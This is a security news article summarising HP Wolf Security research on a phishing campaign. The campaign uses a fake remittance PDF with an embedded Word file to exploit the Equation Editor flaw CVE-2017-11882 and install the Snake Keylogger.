The email campaign also made use of Microsoft Word, which exploited a 22-year-old Office RCE flaw.
While most malicious e-mail campaigns employ Word documents to disguise and spread malware, researchers have uncovered that a recently discovered campaign combines a malicious PDF file and a 22-year-old Office bug to disseminate the Snake Keylogger virus.
According to a blog post published Friday by HP Wolf Security experts, the campaign seeks to fool victims with an attached PDF file claiming to provide details about a remittance payment. Instead, it downloads the data-stealing virus and uses deception to avoid detection.
“While Office formats remain popular, this campaign demonstrates how attackers are also exploiting weaponized PDF documents to infect systems,” stated HP Wolf Security researcher Patrick Schlapfer in the report, titled “PDF Malware Is Not Yet Dead.”
Indeed, for the past decade, malware has been packaged in Microsoft Office file formats, primarily Word and Excel, by attackers utilising malicious email campaigns, according to Schlapfer. According to experts, nearly half (45%) of malware detected by HP Wolf Security in the first quarter of 2022 utilised Office formats.
“The reasons are clear: users are familiar with these file types, and the applications used to open them are widespread,” he said.
Researchers discovered that while the new campaign uses PDF in the file bait, it eventually uses Microsoft Word to deliver the ultimate payload—the Snake Keylogger. According to Fortinet, Snake Keylogger is a.NET malware that first appeared in late 2020 and is targeted at capturing sensitive data from a victim’s computer, including saved credentials, keystrokes, screenshots of the victim’s screen, and clipboard data.
On March 23, the HPW Wolf Security team discovered a new PDF-based threat campaign with a “unique infection chain” that included “various methods to elude detection, such as inserting malicious files, loading remotely-hosted exploits, and shellcode encryption,” according to Schlapfer.
Attackers send victims emails with a PDF document attached named “REMMITANCE INVOICE.pdf” (misspelling intended). Researchers discovered that when someone accesses the file, Adobe Reader prompts them to open a.docx file with an odd name.
“The Word document has been verified,” the attackers cleverly labelled it. According to the post, PDF, Jpeg, xlsx, and.docx were used to make it appear as if the file name was part of the Adobe Reader prompt.
Researchers discovered that the.docx file is stored as an Embedded File object within the PDF, which when clicked on opens Microsoft Word. If Protected View is turned off, Word downloads a Rich Text Format (.rtf) file from a web server and runs it within the open document.
Researchers said they uncovered a URL buried in the “document.xml.rels” file that is not a legal domain found in Office documents when they unzipped the contents of the.rtf—which is an Office Open XML file.
17-Year-Old Bug Exploited
Connecting to this URL causes a redirect, after which an RTF document named “f document shp.doc” is downloaded. This document contains two “not well-formed” OLE objects containing shellcode using CVE-2017-11882, a “almost four-year-old” remote code execution vulnerability (RCE) in Equation Editor, according to researchers. Equation Editor is a Microsoft Office software that allows you to insert and edit complex equations in Microsoft Word documents using Object Linking and Embedding (OLE) elements.
However, it turns out that the issue used by the attackers in the campaign was patched by Microsoft more than four years ago–in 2017, to be exact–but had existed for 17 years before that, making it 22 years old now.
Researchers discovered shellcode in the “OLENativeStream” structure at the conclusion of one of the OLE objects they investigated as the final act of the attack. Researchers discovered that the code finally decrypts a ciphertext that turns out to be further shellcode, which is then executed to produce an executable called fresh.exe, which loads the Snake Keylogger.